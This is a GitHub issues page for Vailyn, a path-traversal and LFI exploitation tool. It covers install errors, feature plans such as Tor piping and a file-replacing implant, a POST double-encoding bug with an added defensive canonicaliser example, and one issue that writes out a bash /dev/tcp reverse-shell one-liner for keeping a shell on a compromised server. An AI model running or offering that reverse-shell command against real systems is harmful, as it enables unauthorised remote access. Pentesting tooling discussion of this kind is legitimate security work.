vainlystrain / vailyn

A phased, evasive Path Traversal + LFI scanning & exploitation tool in Python

License: GNU General Public License v3.0

Python 99.84% Dockerfile 0.16%
websecurity information-leak exploitation vulnerability-scanners directory-traversal path-traversal pentest-tool websec vulnerability-assessment penetration-testing

vailyn's Issues

[2.10] Loot Extractor

When downloading files, extract the leaked data from the rest of the HTML document.

[2.10] Clean up attack.py

The attack routines are way too complex, and contain duplicate code. Clean them up by splitting them into several smaller functions, and regrouping similar behaviour in 1 function.

Installation fails - pyqt5 dependency

Category
Installation issue on Kali

Describe the bug
Installation fails due to pyqt5 dependency

To Reproduce

  1. pip install -r requirements.txt
  2. See error below:
root@kali:/opt/Vailyn# pip install -r requirements.txt 
DEPRECATION: Python 2.7 reached the end of its life on January 1st, 2020. Please upgrade your Python as Python 2.7 is no longer maintained. pip 21.0 will drop support for Python 2.7 in January 2021. More details about Python 2 support in pip can be found at https://pip.pypa.io/en/latest/development/release-process/#python-2-support
Collecting treelib
  Using cached treelib-1.6.1.tar.gz (24 kB)
Requirement already satisfied: requests in /usr/local/lib/python2.7/dist-packages (from -r requirements.txt (line 2)) (2.18.4)
Requirement already satisfied: argparse in /usr/lib/python2.7 (from -r requirements.txt (line 3)) (1.2.1)
Requirement already satisfied: colorama in /usr/local/lib/python2.7/dist-packages (from -r requirements.txt (line 4)) (0.4.3)
ERROR: Could not find a version that satisfies the requirement PyQt5 (from -r requirements.txt (line 5)) (from versions: none)
ERROR: No matching distribution found for PyQt5 (from -r requirements.txt (line 5))

Expected behaviour
Clean installation is expected.

Desktop

  • OS: Kali Linux
Distributor ID: Kali
Description:    Kali GNU/Linux Rolling
Release:        2020.3
Codename:       kali-rolling

Linux kali 5.4.0-kali4-amd64 #1 SMP Debian 5.4.19-1kali1 (2020-02-17) x86_64 GNU/Linux
  • Python Version - 2.7.18
  • pip 20.2

[2.10] Extend targeted attack feature

In Phase 1, it is possible to do a targeted attack. If you know file.php is just above the inclusion folder, you can specify -d 1 x x to greatly reduce the attack duration.

However, if the file sits 3 levels above, Vailyn will still check level 1 and 2.

Extend the targeted attack feature with a new argument --targeted. If provided, only check the exact Phase 1 depth.

[Fix] Server Hangs on Reverse Shell

If the target server is only running on 1 thread, and a reverse shell is spawned, the server doesn't accept HTTP connections any more, leading to a DoS scenario. If this happens in your operation, perform the following steps:

  1. create a new listener on a different port
  2. in your current shell, enter the following command:
bash -i >& /dev/tcp/{YOUR IP}/{NEW PORT} 0>&1 & exit

This will spawn a new shell on your second port and terminate the first, and the server will accept connections again.

how fix this

root@kali:~/Vailyn# python3 Vailyn -h
Traceback (most recent call last):
File "/usr/lib/python3/dist-packages/dbus/bus.py", line 177, in activate_name_owner
return self.get_name_owner(bus_name)
File "/usr/lib/python3/dist-packages/dbus/bus.py", line 361, in get_name_owner
return self.call_blocking(BUS_DAEMON_NAME, BUS_DAEMON_PATH,
File "/usr/lib/python3/dist-packages/dbus/connection.py", line 652, in call_blocking
reply_message = self.send_message_with_reply_and_block(
dbus.exceptions.DBusException: org.freedesktop.DBus.Error.NameHasNoOwner: Could not get owner of name 'org.freedesktop.Notifications': no such name

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
File "/root/Vailyn/Vailyn", line 113, in
notify2.init("Vailyn")
File "/usr/local/lib/python3.9/dist-packages/notify2.py", line 102, in init
dbus_obj = bus.get_object('org.freedesktop.Notifications',
File "/usr/lib/python3/dist-packages/dbus/bus.py", line 241, in get_object
return self.ProxyObjectClass(self, bus_name, object_path,
File "/usr/lib/python3/dist-packages/dbus/proxies.py", line 250, in init
self._named_service = conn.activate_name_owner(bus_name)
File "/usr/lib/python3/dist-packages/dbus/bus.py", line 182, in activate_name_owner
self.start_service_by_name(bus_name)
File "/usr/lib/python3/dist-packages/dbus/bus.py", line 277, in start_service_by_name
return (True, self.call_blocking(BUS_DAEMON_NAME, BUS_DAEMON_PATH,
File "/usr/lib/python3/dist-packages/dbus/connection.py", line 652, in call_blocking
reply_message = self.send_message_with_reply_and_block(
dbus.exceptions.DBusException: org.freedesktop.DBus.Error.ServiceUnknown: The name org.freedesktop.Notifications was not provided by any .service files

[4.0] Custom Crawler Mode

Add a possibility to configure the crawler to only scan for a subset of vectors (instead of all).

[Observation] Pre-run loading takes a long time

Greetings!

I started the first run about 25 minutes back. The % loading is at 13%. This is a query attack run (-a 1) with a very short file & directory list (<10 entries).

  1. Is this expected behavior? Or is it only a first-run behavior?
  2. What parameters does this loading depend on? Is there a way to speed this up?


Thanks.

Advisory: Important Memory Fixes in 2.3+

In Vailyn 2.3, a severe memory issue that caused systems to run out of memory with big directory dictionaries has been resolved. Users are advised to update to the latest version, especially when attacking with huge dictionaries. More improvements to dictionary handling are planned for the future.

[ENH] Tor for Windows

Is your feature request related to a problem? Please describe.
In Vailyn 1.5.1, attacking through Tor is only possible on Linux, because the command used to start the service (systemctl) is not available on Windows.

Describe the solution you'd like
Make Tor piping available for Windows-based systems.

Additional context
Since I don't have a Windows machine (and my VM installations are broken), I will need a hand with implementing this.

[BUG - Help wanted] Requests breaks POST Attack

Category
False Positive | False Negative

Describe the bug
The requests library which this project uses has some strange behaviours, which lead to the POST attack (-a 4) not working correctly.

The issue:
When you use a data dictionary for the POST request, requests percent-encodes the POST data. This leads to more complex evasion payloads failing, even if they should work. Also, the output of the scanner will be wrong. Let's say the server is vulnerable to ..%252f. Then, when Vailyn scans for ..%2f, it is detected as vulnerable, since requests transforms it into %252f. However, ..%2f will be shown as successful, while the real %252f test won't be.

There have been several ways to fix that in the past - none of them worked in this case.

The first way I tried to fix it was using prepared requests and manually setting the body afterwards. The second way was using a string for the data argument instead of a dict. However, both attempts resulted in the scanner finding nothing at all, despite a vulnerability being present.

If anyone reading this knows a fix: I'd really appreciate your help!

To Reproduce
Steps to reproduce the behaviour:

  1. Set up a server with a path traversal vulnerability coming from a POST parameter.
  2. Run Vailyn against this server.

Expected behaviour
Vailyn should output the vulnerability, and the correct payload.

Desktop (please complete the following information):

  • OS: [e.g. Windows, Linux] probably all
  • Program Version [e.g. 1.0] <= latest
  • Python Version [e.g. 3.7] 3.8
  • Requests Version: 2.24.0
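An added example (not Vailyn's code) that reproduces the encoding behaviour this issue describes with urllib.parse.urlencode, which requests uses to build a dict body, and pairs it with a server-side canonicaliser that percent-decodes a parameter until it stops changing, so a traversal attempt is recognised whatever the encoding depth. The parameter name `file` and the sample payload are constructed for the example.

```python
"""Double-encoding of POST data and a fixpoint canonicaliser for defenders."""
from typing import Dict, Tuple
from urllib.parse import urlencode, unquote

# Constructed sample value: the kind of payload a scanner would place in a POST field.
PAYLOAD = "..%2f..%2fetc/passwd"


def dict_body(param: str, value: str) -> str:
    """Body built from a dict: urlencode percent-encodes the value once more,
    so the '%' of '%2f' becomes '%25' and the wire form is '..%252f'."""
    return urlencode({param: value})


def raw_body(param: str, value: str) -> str:
    """Body handed over as a preformatted string: sent verbatim, no extra layer."""
    return "{}={}".format(param, value)


def canonicalise(value: str, max_rounds: int = 5) -> Tuple[str, int]:
    """Percent-decode until a fixpoint (bounded to avoid pathological input).
    Returns the decoded value and the number of encoding layers removed."""
    layers = 0
    while layers < max_rounds:
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
        layers += 1
    return value, layers


def has_traversal(value: str) -> bool:
    """True if any path segment of the fully decoded value is '..'."""
    decoded, _ = canonicalise(value)
    return any(seg == ".." for seg in decoded.replace("\\", "/").split("/"))


def inspect_body(body: str) -> Dict[str, dict]:
    """Walk a form-encoded body without decoding it first, so the layer count
    reflects exactly what was on the wire rather than what parse_qs would show."""
    report = {}
    for pair in body.split("&"):
        name, _, wire = pair.partition("=")
        decoded, layers = canonicalise(wire)
        report[name] = {"wire": wire, "decoded": decoded,
                        "layers": layers, "traversal": has_traversal(wire)}
    return report
```

Comparing `inspect_body(dict_body("file", PAYLOAD))` with `inspect_body(raw_body("file", PAYLOAD))` shows the dict form needs two decode rounds where the raw form needs one, which is exactly why the scanner's reported payload and the payload on the wire disagree.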

[4.0] Path Traversal Implant

Add an option to exploit a path traversal in an upload routine, in order to replace a legitimate server file by a version containing a user-specified payload.

[BUG] Module not found

Category
| Program Crash |

Describe the bug
The program gives the error:
└─# python3.8 Vailyn
Traceback (most recent call last):
File "Vailyn", line 40, in
from PyQt5.QtCore import Qt
ModuleNotFoundError: No module named 'PyQt5.sip'

I have installed all required modules, yet I get the above error.

To Reproduce
Steps to reproduce the behaviour:

  1. Arguments used '...'
  2. Selected payloads '....'
  3. See error '....'

Expected behaviour
The program to run.

Screenshots
If applicable, add screenshots to help explain your problem.

Desktop (please complete the following information):

  • OS: Kali rolling (fully updated)
  • Program Version latest
  • Python Version 3.8

Additional context
Add any other context about the problem here.

Wordlists for LFI

The example commands include dicts/files and dicts/dirs as the wordlists to use.

They are not included in the repo; are we supposed to get them elsewhere or create them? It seems strange that the one thing needed to make the tool work is missing from the repo. dirs2 and files2 are included, but they are too limited to be effective. Maybe I'm misunderstanding the intention behind this project.

I would suggest adding to the wiki some mention of the wordlists to clarify. I'm shocked I'm the first person to ask this.
